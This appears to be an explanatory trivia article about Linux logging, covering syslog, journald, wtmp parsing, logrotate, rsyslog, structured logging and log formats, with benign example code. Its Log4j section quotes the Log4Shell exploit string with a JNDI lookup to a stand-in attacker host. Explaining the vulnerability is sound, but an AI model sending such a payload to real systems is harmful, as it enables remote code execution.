
Linux Logging — Trivia & Interesting Facts

Surprising, historical, and little-known facts about Linux logging.


syslog was written in the 1980s as part of the sendmail project

Eric Allman created syslog in the early 1980s as the logging mechanism for sendmail. It was later adopted as the standard Unix logging interface, documented as-is in RFC 3164 (BSD syslog, an informational RFC) in 2001, and standardized as RFC 5424 (the modern syslog protocol) in 2009. The facility/severity model (kern.err, auth.info, etc.) has remained essentially unchanged for over 40 years.
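
That facility/severity model is encoded in a single number: the priority value that prefixes every syslog message is facility × 8 + severity. A quick check in Python, using only the stdlib syslog module's constants:

```python
import syslog

# RFC 3164/5424 priority value: facility * 8 + severity.
# e.g. auth (facility 4) + info (severity 6) -> PRI 38, sent as "<38>".
AUTH, INFO = 4, 6
pri = AUTH * 8 + INFO
print(pri)  # 38

# The stdlib syslog module encodes the same scheme as bit flags:
# LOG_AUTH is 4 << 3 and LOG_INFO is 6, so OR-ing them yields 38.
assert syslog.LOG_AUTH | syslog.LOG_INFO == pri
```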


The journald binary log format was one of systemd's most controversial changes

When systemd introduced journald with structured binary logs, it sparked fierce debate. Critics argued that binary logs were harder to inspect when the system was broken (exactly when you need logs most). Proponents countered that structured logs with indexed fields, automatic rotation, and forward-secure sealing were worth the tradeoff. Most distributions now run both journald and a syslog daemon side by side.


/var/log/wtmp has tracked every login since the 1970s

The wtmp file records every login and logout event, and its format dates back to early Unix. The last command reads wtmp to show login history. A companion file, btmp, records failed login attempts. Both use a fixed-size binary record format that has remained compatible across decades, though the record size varies between 32-bit and 64-bit systems.
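
For illustration, here is a minimal parser for that fixed-size record format, assuming the glibc layout on x86-64 Linux (384-byte records). Offsets differ on other ABIs, so this is a sketch, not a portable reader:

```python
import struct

# glibc utmp record layout on x86-64 Linux: 384 bytes per entry.
# Field order: ut_type, ut_pid, ut_line, ut_id, ut_user, ut_host,
# exit status (2 shorts), session, tv_sec, tv_usec, addr_v6, padding.
UTMP_FMT = "<h2xi32s4s32s256s2h3i4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384 on this layout

def parse_wtmp(data):
    """Yield (type, pid, line, user, host, epoch_secs) per record."""
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        ut_type, pid, line, _id, user, host, _e0, _e1, _sess, sec, _usec, *_ = \
            struct.unpack_from(UTMP_FMT, data, off)
        yield (ut_type, pid,
               line.rstrip(b"\0").decode(),
               user.rstrip(b"\0").decode(),
               host.rstrip(b"\0").decode(),
               sec)
```

Pointing this at /var/log/wtmp reproduces roughly what the last command prints; ut_type 7 (USER_PROCESS) marks a login.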


Linux log rotation was invented because disks used to fill up constantly

logrotate, written by Erik Troan at Red Hat in the late 1990s, solves the problem of logs growing without bound. It compresses, rotates, and eventually deletes old log files based on age or size. The tool runs via cron (or a systemd timer) and uses a state file to track when each log was last rotated. Without it, /var/log filling a partition was one of the most common Linux outages.
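
A typical policy looks like the sketch below (the /var/log/myapp path and myapp.service name are placeholders): weekly rotation, eight compressed generations kept, and a HUP signal so the daemon reopens its log file after rotation.

```
/var/log/myapp/*.log {
    weekly
    rotate 8
    compress
    delaycompress
    missingok
    notifempty
    postrotate
        systemctl kill -s HUP myapp.service
    endscript
}
```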


The kernel ring buffer loses messages when it wraps around

The kernel's dmesg buffer is a fixed-size circular buffer; its size is set at build time by CONFIG_LOG_BUF_SHIFT (typically 64 KB to 256 KB) and can be overridden at boot with the log_buf_len kernel parameter. When it fills up, old messages are silently overwritten. On systems generating heavy kernel messages (frequent USB events, noisy drivers), early boot messages can vanish before any daemon reads them. journald's kmsg reader mitigates this by consuming messages in real time.
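
The overwrite behavior is easy to model: a fixed-capacity deque in Python behaves like the ring buffer, silently discarding the oldest entry on every append once full.

```python
from collections import deque

# A fixed-capacity deque models the kernel ring buffer: once full,
# appending a new message silently discards the oldest one.
ring = deque(maxlen=4)
for i in range(7):
    ring.append(f"msg {i}")

print(list(ring))  # ['msg 3', 'msg 4', 'msg 5', 'msg 6'] - msgs 0-2 are gone
```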


rsyslog can process over one million messages per second

rsyslog, the default syslog implementation on most Linux distributions since the late 2000s, was rewritten with a multi-threaded architecture that can sustain over one million log messages per second. It supports output to files, databases (MySQL, PostgreSQL), Elasticsearch, Kafka, and remote syslog servers. Its configuration syntax, while powerful, is notoriously difficult to read.
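
As a flavor of that syntax, here is a sketch of a forwarding rule in the modern RainerScript style; logs.example.com, the port, and the queue filename are placeholders. The disk-assisted queue buffers messages if the collector is briefly unreachable:

```
# Forward everything to a central collector over TCP, with an
# on-disk queue so messages survive short outages.
*.* action(type="omfwd"
           target="logs.example.com" port="6514" protocol="tcp"
           queue.type="LinkedList" queue.filename="fwd_queue"
           action.resumeRetryCount="-1")
```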


Structured logging with JSON solved the parsing problem

Traditional syslog messages are unstructured text, requiring fragile regex parsing to extract fields. The shift to structured logging (JSON lines, key-value pairs) in the 2010s made logs machine-parseable. Tools like journald, Fluentd, and application frameworks (Python's structlog, Go's zerolog) produce logs where each field is queryable without regex.
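
A minimal sketch of the idea in Python, using only the stdlib logging module (the field names here are an arbitrary illustration, not a standard schema):

```python
import json
import logging

class JsonFormatter(logging.Formatter):
    """Emit each record as one JSON object per line ("JSON lines")."""
    def format(self, record):
        return json.dumps({
            "ts": self.formatTime(record),
            "level": record.levelname,
            "logger": record.name,
            "msg": record.getMessage(),
            # Any extra fields become queryable keys, no regex needed.
            **getattr(record, "fields", {}),
        })

logger = logging.getLogger("app")
handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
logger.addHandler(handler)
logger.warning("disk usage high", extra={"fields": {"mount": "/var", "pct": 91}})
```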


The auth.log file is the first place to check after a security incident

On Debian-based systems, /var/log/auth.log (RHEL uses /var/log/secure) records every authentication event: SSH logins, sudo commands, su usage, PAM failures, and key-based auth. During incident response, this file — combined with journalctl _TRANSPORT=audit — provides the timeline of who accessed the system and what they did.


Log forwarding over UDP can silently lose messages

Traditional syslog forwarding uses UDP port 514 by default. UDP provides no delivery guarantee, no congestion control, and no acknowledgment. Under load, the receiving syslog server (or any intermediate network device) can silently drop messages. This is why modern log pipelines use TCP-based transport (RELP, TCP syslog) or message brokers like Kafka for reliable delivery.
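
The fire-and-forget nature is visible in code: a UDP sender returns immediately whether or not anyone received the datagram. A simplified RFC 3164-style sketch in Python (the hostname and tag are placeholders, and the timestamp is omitted for brevity):

```python
import socket

def send_syslog_udp(msg, host="127.0.0.1", port=514,
                    facility=1, severity=6):  # user.info
    """Fire-and-forget RFC 3164-style datagram: no ack, no retry."""
    pri = facility * 8 + severity
    packet = f"<{pri}>myhost myapp: {msg}".encode()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        # sendto succeeds even if nothing is listening on the far end.
        s.sendto(packet, (host, port))
    return packet
```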


journalctl can correlate logs across all services by boot ID

journald assigns a unique boot ID to each system boot. Running journalctl --list-boots shows all recorded boots, and journalctl -b -1 shows logs from the previous boot. This boot-aware correlation is invaluable for diagnosing why a system rebooted — you can see the last messages before the crash without manually cross-referencing timestamps.


The word "log" comes from maritime navigation

Ships historically measured speed by throwing a wooden log overboard and timing how long the rope took to pay out. The record of these measurements was kept in the "log book." Computer logging inherited the term — a sequential record of events, ordered by time, for later analysis. The nautical term dates back to at least the 16th century.


The Apache web server's Combined Log Format has been unchanged since 1995

Apache's Combined Log Format, which extends the Common Log Format (CLF) with Referer and User-Agent fields, has remained essentially unchanged for 30 years. Nearly every web server, load balancer, and CDN supports it. This single log format has probably been parsed by more scripts and tools than any other format in computing history.
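
The format is regular enough that one regular expression covers it, which is exactly why so many tools parse it. A sketch in Python, against a sample line in the style of the Apache documentation's examples:

```python
import re

# One regex for the combined format: the CLF fields plus the quoted
# Referer and User-Agent at the end.
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

line = ('203.0.113.9 - frank [10/Oct/2000:13:55:36 -0700] '
        '"GET /index.html HTTP/1.0" 200 2326 '
        '"http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I)"')

m = COMBINED.match(line)
print(m.group("status"), m.group("agent"))  # 200 Mozilla/4.08 [en] (Win98; I)
```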


Log4j is in 70% of Java applications and its vulnerability affected the entire internet

Apache Log4j is embedded in a large majority of Java applications; commonly cited estimates put its usage near 70%. When CVE-2021-44228 (Log4Shell) was disclosed in December 2021, it affected devices numbering in the billions by some estimates. The vulnerability allowed remote code execution through a simple log message like ${jndi:ldap://attacker.com/a}, and it was rated 10.0/10.0 on the CVSS scale, the maximum possible severity.


printf debugging is the most common debugging technique despite decades of tool development

Despite sophisticated debuggers, profilers, and tracing systems, surveys consistently show that the most common debugging technique is adding print/log statements to code. A 2019 JetBrains survey found that over 60% of developers use print/log statements as their primary debugging method. Linus Torvalds has publicly stated that he debugs the Linux kernel primarily through printk statements.


The twelve-factor app methodology says logs should go to stdout, not files

The Twelve-Factor App methodology (2012) controversially argued that applications should never manage their own log files — they should write unbuffered to stdout, and the execution environment should handle collection and routing. This principle was considered radical at the time but became standard practice in containerized environments where writing to local files is often impossible.
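
In practice that means one handler bound to sys.stdout and nothing else; a minimal Python sketch:

```python
import logging
import sys

# Twelve-factor style: write one event stream to stdout and let the
# platform (systemd, Docker, Kubernetes) capture and route it.
logging.basicConfig(
    stream=sys.stdout,
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(name)s %(message)s",
    force=True,  # replace any handlers configured earlier
)
logging.getLogger("worker").info("job finished")
```

Under systemd, the same stdout stream lands in the journal automatically; in Docker, it becomes `docker logs` output.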


Correlation IDs were independently invented by dozens of organizations

The practice of including a unique request ID (correlation ID, trace ID) in every log message to trace a request across multiple services was independently reinvented by teams at Amazon, Google, Twitter, and many others. Before distributed tracing standards like OpenTelemetry formalized the concept, every organization had its own incompatible format for request correlation.
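
Today the pattern is usually a context-propagated ID stamped onto every record. A sketch with Python's contextvars and a logging filter (the request_id field name is a convention for this example, not a standard):

```python
import contextvars
import logging
import uuid

request_id = contextvars.ContextVar("request_id", default="-")

class CorrelationFilter(logging.Filter):
    """Stamp every record with the current request's ID so any log line
    can be joined back to the request that produced it."""
    def filter(self, record):
        record.request_id = request_id.get()
        return True

logger = logging.getLogger("svc")
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(request_id)s %(message)s"))
handler.addFilter(CorrelationFilter())
logger.addHandler(handler)

token = request_id.set(uuid.uuid4().hex[:8])  # set once at request entry
logger.warning("payment declined")            # this line carries the ID
request_id.reset(token)
```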